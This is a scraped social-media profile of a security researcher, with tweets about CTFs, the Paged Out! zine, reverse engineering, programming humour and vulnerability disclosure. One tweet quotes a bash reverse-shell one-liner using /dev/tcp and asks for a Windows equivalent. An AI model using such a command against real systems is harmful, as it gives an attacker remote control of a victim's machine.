Gynvael Coldwind Profile Banner
Gynvael Coldwind Profile
Gynvael Coldwind

@gynvael

Followers
38,253
Following
1,295
Media
453
Statuses
6,217

security researcher/programmer/director @ HexArcana Cybersecurity GmbH ⁂ @pagedout_zine @DragonSectorCTF ⁂ ⁂ ex-Google ⁂ he/him

Zürich, Switzerland
Joined July 2009
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
Pinned Tweet
@gynvael
Gynvael Coldwind
2 months
Paged Out! #4 has some amaazinggg stuff inside. And it's free. Like free free, you don't even have to give out your email address :)
@pagedout_zine
PagedOut
2 months
Issue #4 is out – enjoy! Please RT and tell your friends :)
Tweet media one
5
301
552
3
52
170
@gynvael
Gynvael Coldwind
5 years
Me coding with ~5y experience: 1. write code Me coding with ~30y experience: 1. read docs for fopen() 2. write 1 line of code 3. check 17 different things in docs/internets about fopen 4. reverse fopen implementation because this one detail... 5. decide to use different function.
33
677
3K
@gynvael
Gynvael Coldwind
3 years
How to read a file in C according to NETGEAR
Tweet media one
89
554
3K
@gynvael
Gynvael Coldwind
5 years
Paged Out! #1 is out! (and it's free to download!) There are 57 articles in 12 categories: Electronics Programming Assembly Reverse Engineering Sec/Hack Retro File Formats Algorithmics SysAdmin Radio Phreaking OS Internals Enjoy! #PagedOut !
39
977
2K
@gynvael
Gynvael Coldwind
1 year
Friday was my last day at Google. I'm saddened to leave behind my team of the last 12+ years, but I know Google's security is in great hands. It's time for a short break and then I'm moving on with plans I've made long ago – my own sec research, consulting, and education company.
75
33
1K
@gynvael
Gynvael Coldwind
8 months
My first program in Python! I still find this syntax a bit confusing with no { } etc. def main( line0: print("Hello World!"), line1: print("What's your name?"), line2: (x := input("Name plz: ")), line3: print(f"Your name is: {x}") ): pass
Tweet media one
43
94
1K
@gynvael
Gynvael Coldwind
2 years
So an AMD engineer and 2 Google engineers walk into a bar... and write an article about how "Hello World" in #Python works. The article turns out to be 26 pages. From Python, through C, WinAPI/Kernel, font rendering, to GPU. Enjoy!
@Reg__
Adam Sawicki
2 years
"Hello World under the microscope" - an article we wrote together with @gynvael and @j00ru ! Originally published in issue 100 (1/2022) of the Programista magazine, now available online in Polish and English.
5
68
291
12
268
912
@gynvael
Gynvael Coldwind
5 years
A fun and innovative ZIP bomb by David Fifield (and an excellent technical write-up - take a look if you like file format hacks): zbsm.zip42 kB→5.5 GB zblg.zip10 MB→281 TB zbxl.zip46 MB→4.5 PB
7
314
759
@gynvael
Gynvael Coldwind
2 months
Python was too hard so I've switched to C++. Here's my first "Hello World"!
Tweet media one
@gynvael
Gynvael Coldwind
8 months
My first program in Python! I still find this syntax a bit confusing with no { } etc. def main( line0: print("Hello World!"), line1: print("What's your name?"), line2: (x := input("Name plz: ")), line3: print(f"Your name is: {x}") ): pass
Tweet media one
43
94
1K
22
49
760
@gynvael
Gynvael Coldwind
2 years
I just randomly found a YouTube channel with 22 videos that explain modern cryptographic algorithms + show how to implement them in Python! Awesome for learning crypto! The channel has 80 subs. Any chance we could show some love to the creator? Plz RT
15
219
722
@gynvael
Gynvael Coldwind
2 years
Boss: Hey IT guy, can you program our pharmacy logo to flash or sth? Bob: Say no more! Narrator: Bob, a demoscene veteran, was waiting for this opportunity for 25 years.
@FlorianVltmn
flo (same username on bsk y)
2 years
One of my fav TikTok things is people discovering the insane VJ’s we employ for our pharmacies in Europe
110
4K
21K
14
126
665
@gynvael
Gynvael Coldwind
6 years
TIL from @q3k and @marcan42 : wget saves downloaded file's source URL (and sometimes referrer) in extended attributes. This includes the cases where the URL has a user/password in it 🙃 $ getfattr -d -m - test user.xdg.origin.url=" https://user:[email protected]/"
10
290
657
@gynvael
Gynvael Coldwind
3 years
Random tip for Windows users: If you are worried about accidentally double-clicking a malicious executable in your Download folder or are worried about random DLLs (carpet bombing / DLL hell), just DISABLE EXECUTION in that folder: icacls Download /deny Everyone:(OI)(IO)(X)
11
148
534
@gynvael
Gynvael Coldwind
5 years
I think these are the two most useful posts I have on my blog (i.e. I'm referencing them in chat a lot): FAQ: How to learn reverse-engineering? FAQ: How to find vulnerabilities?
2
144
456
@gynvael
Gynvael Coldwind
3 years
Just a daily reminder, that the C / C++ compiler is happy to remove any code it thinks doesn't make sense according to the standard.
Tweet media one
13
75
452
@gynvael
Gynvael Coldwind
3 years
If you're just starting in programming/infosec, here's a list of obvious and less obvious things you can put on your CV - a 🧵 Some of these things can be done in a week and might improve your CV. Did I miss something? Please add to the thread. And RT so it helps more people :)
10
158
455
@gynvael
Gynvael Coldwind
7 months
Yesterday's "Breaking "DRM" in Polish trains" talk by @dsredford / MrTick / q3k was one of the best investigative reverse-engineering case studies I've seen. It's a must watch.
5
122
445
@gynvael
Gynvael Coldwind
5 years
That feeling when you're in a tram and the wrong texture gets loaded.
Tweet media one
7
56
442
@gynvael
Gynvael Coldwind
3 years
Service announcement: I've got the so-called long-COVID (3 months in at this point), so currently all my projects (YouTube livestreams, @pagedout_zine , etc) are put on hold until I get better. Sorry!
123
14
435
@gynvael
Gynvael Coldwind
5 years
A fun site with simple / entry-level hacking challenges: :)
2
111
424
@gynvael
Gynvael Coldwind
5 years
Paged Out! #2 (Nov 2019) is out! And it's free to download :) This issue has 55 articles in 11 categories: Programming OS Internals Assembly Operating Systems GameDev Electronics Security/Hacking SysAdmin Reverse Engineering Algorithms Writing Articles
Tweet media one
5
218
422
@gynvael
Gynvael Coldwind
3 years
Brought to you by the same school of thought as the eternal classics like: system("cls"); and system("pause");
6
19
394
@gynvael
Gynvael Coldwind
4 months
Tweet media one
1
47
397
@gynvael
Gynvael Coldwind
3 years
C++ is really hard, I just tried to write Hello World! in it and it took me way too long...
Tweet media one
26
37
373
@gynvael
Gynvael Coldwind
4 months
Some notes from analyzing the bash part obfuscation of the xz/liblzma part – link leads to the part I found most interesting – it was added in 5.6.1:
3
116
343
@gynvael
Gynvael Coldwind
2 years
Windows 11 is wonderful! So I'm switching to Linux (Kubuntu) on my main PC - apologies to all hackers who had a shell on my device from the last re-install ~10-16 years ago. Anyway, I'll use this thread to note some funny bits I notice during migration.
22
27
338
@gynvael
Gynvael Coldwind
5 years
My English YT channel with security/programming livestreams just passed the 20000 subscriber mark! I'm really happy right now :)
20
21
331
@gynvael
Gynvael Coldwind
5 years
< @yyyyyyy > congrats to Drunk Sector for finding out about their team name only 40 hours into the competition! I don't even 🤣🤣🤣 #TrolledAtCCCCTF #IDontEven #Potatos
Tweet media one
5
35
329
@gynvael
Gynvael Coldwind
5 years
Call for One Page Articles for the 1st issue of Paged Out! zin! (it's a new free experimental deeply technical zin we're starting; it's about programming/security/hacking/demoscene/retro/electronics/etc) Details: Story: Please RT :)
Tweet media one
8
218
320
@gynvael
Gynvael Coldwind
5 years
WOW, the response to #pagedout is amazing :) In a little over 24h we hit 50 000 downloads, and the counter is still spinning (56657 atm). Awesome :)
16
21
316
@gynvael
Gynvael Coldwind
3 months
So @j00ru published two posts on Windows Registry; given that there were a lot of fixes in Windows Registry in recent months I expect these to be fun ;)
8
134
298
@gynvael
Gynvael Coldwind
2 years
Ah dealing with companies with poor security processes is always such a pleasure. Here's Powertek threatening me with their lawyers for disclosing (patched) vulnerabilities in their PDUs:
Tweet media one
12
24
292
@gynvael
Gynvael Coldwind
4 years
If you're into programming, hacking, retro computers, electronics, etc check out our free magazine: 💾 Issues #1 and #2 are already out! For Issue #3 we're looking for: - Articles and Art! - Free community ads! - And sponsorship ads! Deadline: 20.02.20
Tweet media one
7
118
291
@gynvael
Gynvael Coldwind
3 years
An educational CTF for beginners - no ranking, no scoreboard, no stress :) Enjoy!
@GoogleVRP
Google VRP (Google Bug Hunters)
3 years
Google CTF Beginners Quest 2021 is on! ?!:) Go! Now! You have the fate of the world in your hands!
25
256
763
5
73
282
@gynvael
Gynvael Coldwind
5 years
Woah that was a busy month! - Google CTF Finals (co-organizing) - Security PWNing Conference (co-organizing) - Dragon CTF (co-organizing) - Paged Out! #2 (organizing) Time for some rest :)
Tweet media one
Tweet media two
Tweet media three
Tweet media four
5
12
271
@gynvael
Gynvael Coldwind
2 years
An informal review of CTF abuse (or how folks try to win CTFs in a not purely ethical way): Know more stories like this which I've missed? Please share!
15
67
264
@gynvael
Gynvael Coldwind
8 years
I've been livestreaming sec/hack/code stuff in Polish for some time now. Anyone interested in streams in English?
Tweet media one
49
66
253
@gynvael
Gynvael Coldwind
5 years
A pretty amazing opportunity to see (and compare RE methods of) 4 security youtubers/streamers as they go against an upgraded Google CTF 2018 BQ RE challenge - Kudos to ReverseiT & @MurmusCTF @Zanidd @_johnhammond @LiveOverflow !
4
60
252
@gynvael
Gynvael Coldwind
4 years
Bored and looking for a 5 minute web security challenge? http://35.204.139.205:5000/
26
53
242
@gynvael
Gynvael Coldwind
2 years
ingredients=flour%20butter%20sugar%20egg%20salt;temperature=180;mix=1;bake=1 If Twitter can store its cookies in my browsers, I'm going to store my cookies on Twitter 😠
2
29
233
@gynvael
Gynvael Coldwind
4 years
g++ -o
@medburnbook
status annoyicus
4 years
give me a horror story from your specialty in five words or less
19K
866
9K
7
17
234
@gynvael
Gynvael Coldwind
5 years
I'm going to do a longer stream tomorrow (expected 4h) to solve all the challenges from Google's CTF Beginners Quest 2019. There are 13 challenges, some of them having two flags. Should be fun :) #googlectf
Tweet media one
4
64
226
@gynvael
Gynvael Coldwind
5 years
Any ideas for Masters/Bachelors thesis topics around malware analysis, reverse engineering, low-level security or other infosec topics? Please RT too - I get this question a lot and I always struggle to answer. So I hope to use our community's wisdom and send folks here :)
27
155
231
@gynvael
Gynvael Coldwind
3 years
My new hobby: Pinging DNS/LDAP of every log4j scan attempt I find in my logs ;)
6
12
223
@gynvael
Gynvael Coldwind
2 years
Current collection of cursed operators in various programming languages (from various sources). New submissions welcomed! Featuring at least #javascript #python #c and #cpp , but most of these "work" in other languages too.
Tweet media one
16
51
219
@gynvael
Gynvael Coldwind
2 years
So it's been about a month since I switched from Windows 10 to Linux (Kubuntu) on my main workstation. Here's a 🧵with some thoughts. If you have any hints towards the points below, or in general, do let me know :)
Tweet media one
10
9
209
@gynvael
Gynvael Coldwind
3 years
Tip of the day: Don't encrypt your backups with SHA256. Compression ratio might be good, but recovery is a terrible experience.
13
14
201
@gynvael
Gynvael Coldwind
2 years
A really solid command-line JSON viewer for Linux I found today: - super useful when dealing with documented-as-usual-so-not-at-all JSON APIs :) Remember to type :help to see keyboard shortcuts. And it also supports mouse in a proper way!
3
53
193
@gynvael
Gynvael Coldwind
6 years
My weird php://filter/convert.iconv solution for Cool Storage System stage 2 of @1ns0mn1h4ck CTF Teaser: Pretty crazy if you would have asked me ;)
7
105
192
@gynvael
Gynvael Coldwind
4 years
Question: An up-to-date book for getting to know Linux Kernel (internals)? Recommendations welcomed :) If you have non-book resources on the topic: also welcomed!
13
33
191
@gynvael
Gynvael Coldwind
5 years
If you're wondering why did we explicitly banned cryptocurrency/blockchain ads, here are a couple of fun screenshots (1st one if from a PM, the rest from my public discord) ;) #pagedout
Tweet media one
Tweet media two
Tweet media three
16
18
184
@gynvael
Gynvael Coldwind
6 years
New into CTFs? Full-format ranked CTFs look scary? Or just looking to have fun and learn something? Try the Beginners Quest @ Google CTF Quals :) #GoogleCTF
2
81
187
@gynvael
Gynvael Coldwind
2 years
It's my 12th Google work anniversary yay 🎉
9
1
185
@gynvael
Gynvael Coldwind
3 years
After almost a full year I've scheduled the next livestream - Friday, 6PM CEST, Google Beginners Quest CTF 2021 - solving all tasks :)
9
26
184
@gynvael
Gynvael Coldwind
6 months
Made me laugh
Tweet media one
1
15
181
@gynvael
Gynvael Coldwind
6 years
In the topic of #GoogleCTF - I will be showing how to solve all of the Beginners Quest challenges on a special livestream tomorrow (Tue), 8pm CEST: (recording will be available)
4
73
180
@gynvael
Gynvael Coldwind
6 months
JS support in MySQL: From a programmer's perspective: Sounds pretty useful! From a security engineer's perspective: ↓↓↓
Tweet media one
8
33
181
@gynvael
Gynvael Coldwind
4 years
The final match of Hackceler8 (GoogleCTF Final Event) is now over! 1st + $3k. PPP ( @PlaidCTF ) 2nd + $2k. I Use Bing 3rd + $1k. pasten ( @pastenctf ) 4th + $500. TFNS ( @FlatNetworkOrg ) Congratz! Our experimental speed-hacking competition is now over. Videos soon! GG :)
Tweet media one
3
25
178
@gynvael
Gynvael Coldwind
6 years
In case you're wondering how block ciphers work... (one of my viewers sent it to me; too funny not to share; in my defense, the stream wasn't about block ciphers 🙃)
3
37
176
@gynvael
Gynvael Coldwind
4 years
Time flies ;)
Tweet media one
9
2
175
@gynvael
Gynvael Coldwind
3 months
This reminded me of when early in my career I reported a vulnerability in Starcraft map format (potential RCE) to Blizzard and in reply got advice to install an anti-virus and a firewall 🙃 Reporting vulnerabilities is an art of its own 😆
@NoobieDog
Stu Kennedy
3 months
Vulnerability Disclosure: Me: Hi, do you have a contact to discuss vulnerabilities in your product? Them: Na fam, chill! We got this!! 🤨
Tweet media one
25
26
563
6
19
174
@gynvael
Gynvael Coldwind
4 years
Question: What's the shortest Windows reverse shell that you know? Is there something like GNU/Linux' bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ? Obligatory disclaimer: Asking for a friend.
14
29
168
@gynvael
Gynvael Coldwind
4 years
Congratz to @j00ru for his 4th Pwnie Award! :) This was absolutely amazing research - well deserved!
7
16
168
@gynvael
Gynvael Coldwind
7 years
FAQ: How to find vulnerabilities?
3
98
165
@gynvael
Gynvael Coldwind
6 years
Recording of solving all (19) challenges from #GoogleCTF Beginners Quest is up: (description has timestamps for all challenges + a link to the github repo with scripts/notes)
1
66
165
@gynvael
Gynvael Coldwind
5 years
Our security team is hiring in Zurich/Sunnyvale/Seattle! We're looking for security specialists interested in security code reviews of both large complex systems and smaller applications (all over the software stack - from web apps, down to even firmware). DM me if interested.
8
60
160
@gynvael
Gynvael Coldwind
3 years
Found this on reddit, had to re-share :)
Tweet media one
4
19
163
@gynvael
Gynvael Coldwind
4 years
A question: Which infosec companies employ & hire folks on Vulnerability Researcher position (>50% of work time spent on vulnerability research)? I know a few, but I'm wondering if there are more companies like that. And yes, I know it's pretty rare :)
29
29
161
@gynvael
Gynvael Coldwind
3 years
Stephen from my team just published his amazing research on Spectre exploitation in JS via Browser (spoiler: yes, it's exploitable)! Details on , but also at .
@_tsuro
stephen
3 years
I made a website:
12
309
984
2
58
165
@gynvael
Gynvael Coldwind
2 years
Oh my. Please don't ;) A friendly reminder that you pronounce "eval" the same way as "evil".
Tweet media one
5
16
161
@gynvael
Gynvael Coldwind
3 years
Service announcement update: Still having post COVID syndrome (9 months in at this point). All projects (YouTube livestreams, @pagedout_zine , etc) are still on hold. Sorry!
28
3
160
@gynvael
Gynvael Coldwind
2 years
Trying to add enough cameras over my hardware desk so I could actually include it in livestreams. Progress so far includes 2 main cameras in place (overhead and microscope) and a lot of cable management on the horizon.
Tweet media one
10
1
154
@gynvael
Gynvael Coldwind
4 months
Boosting signal for folks analyzing liblzma/xz: q3k: "I have managed to extract a list of encoded strings within the liblzma/xz backdoor payload (5.6.1)"
2
52
151
@gynvael
Gynvael Coldwind
5 years
@LiveOverflow @svblxyz @KodyKinzie @YouTube Nah, our channels will be fine since we only show how to bypass INsecure computer systems ;) On a more serious note I'll take a look when I'm back from vacation.
1
7
151
@gynvael
Gynvael Coldwind
2 years
That happy feeling when you're porting a legacy script from Python 2 to Python 3 and all it takes is adding ( ) to prints ☺️
8
2
150
@gynvael
Gynvael Coldwind
6 years
Congratz to @EatSleepPwnRpt for top1 in Geneva! Good Game, Well Played! :) @DragonSectorCTF finished 2nd this time (yay!), with @p4_team third (well done!). Kudos to @1ns0mn1h4ck for making yet another great CTF :)
Tweet media one
Tweet media two
Tweet media three
Tweet media four
3
34
152
@gynvael
Gynvael Coldwind
2 years
There are very few things I find more annoying in my PC setup than @razer 's idea to login-wall mouse sensitivity settings.
Tweet media one
19
3
140
@gynvael
Gynvael Coldwind
5 years
@matelord Oh, there's a library for that! 😆
4
17
137
@gynvael
Gynvael Coldwind
3 years
Hey @github , what's the reason that you're allowing an account impersonating me, abusing my copyrights+trademarks to stand active for over 11 days from it being reported to you by multiple parties? Is this the typical pace you're dealing with abuse? Ctx:
5
33
142
@gynvael
Gynvael Coldwind
2 years
Dear Jonathan: "Accepted" means an engineer has accepted to look at your report - that's about it, nothing less, nothing more. It does not mean your report has been considered valid - this will be decided later on and communicated in a reply.
10
7
141
@gynvael
Gynvael Coldwind
6 years
Return to the basics today on stream - use-after-free class of bugs :) When: 8pm CET Where:
Tweet media one
1
55
136
@gynvael
Gynvael Coldwind
4 years
Absolutely amazing article on ZIP files by @hansw2000 , with in-depth description of the compression algorithms and a step-by-step example implementation!
0
46
132
@gynvael
Gynvael Coldwind
1 year
Hey folks! Since my sabbatical is over I wanted to grab this opportunity to discuss what was (Google), what will be (my next plans), and get back to livestreaming at the same time. EN (this Tue 8PM CEST): PL (this Wed 8PM CEST):
Tweet media one
0
16
134
@gynvael
Gynvael Coldwind
5 years
Our CTF team placed top1 @ in 2019! That's the 3rd top1 in the history of our team, and I'm really proud of our team's accomplishments! Kudos to our captain valis, our vice-captain @dsredford , all the team members and all guest players that played with us!
@DragonSectorCTF
Dragon Sector
5 years
2019 was a great year for Dragon Sector! 🏆1st place at global ranking for the 2nd year in a row & 3rd time in the history of our team 🥇1st place at 2 CTFs 🥈2nd place at 5 CTFs 🥉3rd place at 5 CTFs 💻And also organized a well received Dragon CTF 2019!
Tweet media one
10
21
314
3
4
134
@gynvael
Gynvael Coldwind
3 years
def found an RCE in a terminal with ANSI escape codes - I guess '80s called and wanted their vulnerabilities back ;)
2
29
131
@gynvael
Gynvael Coldwind
3 years
How to make sure no one complains about your soldering quality - tutorial: 1. Solder wires to the PCB. 2. Put a huge blob of glue on top of it. 3. ... 4. Profit?
Tweet media one
5
6
132
@gynvael
Gynvael Coldwind
3 years
This case is hilarious ;) It's an 0-day. When SSD tried to report to @NETGEAR / @Bugcrowd , whoever handled the report seems to have ???misread the newest firmware version for R7000 as 1.3.2.134???, and the bug affects only 1.0.11.116. Problem is, 1.0.11.116 is the newest fw🙃
@SecuriTeam_SSD
SSD Secure Disclosure
3 years
New advisory is now out! The Nighthawk R7000 is a popular Netgear router, with over 50,000 positive reviews on Amazon. Find out how a vulnerability in NETGEAR R7000 allows an attacker to run arbitrary code without requiring authentication.
4
51
239
1
36
128
@gynvael
Gynvael Coldwind
5 years
I'm in full vacation mode and I decided to play Amberstar (1992). I played a few hours and decided the UX is, well, 1992-like. So now I'm learning AmigaOS/M68K assembly to change some things that were annoying me... I'll be posting some curious things I find in this thread.
Tweet media one
3
18
133
@gynvael
Gynvael Coldwind
3 years
I don't like this fuzzer
@gabsmashh
Lady G
3 years
what doesn't kill you mutates & will try again.
21
229
1K
0
16
131
@gynvael
Gynvael Coldwind
5 years
This! The "Reverse Compilation Techniques" thesis by @criscifuentes was one of two main resources I've used when learning reverse engineering (the other was "Reversing: Secrets of Reverse Engineering" book). Definitely recommended reading :)
@silviocesare
Silvio Cesare
5 years
A sometimes lost fact, but the entire field of decompilation using compiler and program analysis techniques that we know as standard practice today as seen in IDA Hex Rays and Ghidra was invented by @criscifuentes and her thesis on the DCC decompiler in 1994.
7
64
183
0
24
129
@gynvael
Gynvael Coldwind
1 year
This idea is absolutely barbaric and just gruesome. Folks, I am a vulnerability researcher. I stare at the screen the whole day looking at code. And you want me to do THIS?! The whole idea is bound to just bring pain and suffering to people. I'm fine with the boxing part though.
@0xTib3rius
Tib3rius
1 year
@hackthebox_eu ok, hear me out. "Hack The Boxing". It's like Chess Boxing, but we alternate between boxing and solving a HTB machine. I just thought up the concept, but can't claim credit for the name.
14
7
114
5
8
131
@gynvael
Gynvael Coldwind
1 year
A not-so-short writeup about solving a reverse-engineering challenge using a side-channel attack: that's from Byte Bandits CTF 2023 - gg :)
3
33
127
@gynvael
Gynvael Coldwind
6 years
Finally reached 10k subs on my English YT channel! :) Thank you for your trust! (though seriously, keep verifying what I say) And kudos + big thx to my livestream team for helping me out: @foxtrot_0x4fult @KrzaQ2 @disconnect3d_pl @masakralol and maryush :)
3
16
128
@gynvael
Gynvael Coldwind
2 years
Sometimes I can't tell the difference between a CTF task and configuring a Linux service...
2
15
128
@gynvael
Gynvael Coldwind
6 months
One of my favorite things about Switzerland: trust in society The flower shop in the photo is closed, but the merchandise is left outside. The sign blocking the door says "if the door is closed, it's self service; scan QR-CODE to pay with TWINT". And that's not a rare thing!
Tweet media one
5
2
126
@gynvael
Gynvael Coldwind
3 years
After a long wait we released match videos/sources of our experimental CTF-meets-speedrunning competition - Hackceler8! BIG THANKS to the competing CTF teams and all the Hackceler8 organizers!
0
37
127
@gynvael
Gynvael Coldwind
2 years
One of the projects I'm working on again this year is Google CTF, and it's finally about to happen! 1-3 July :) There will be fun tasks :)
@GoogleVRP
Google VRP (Google Bug Hunters)
2 years
1
96
261
2
12
125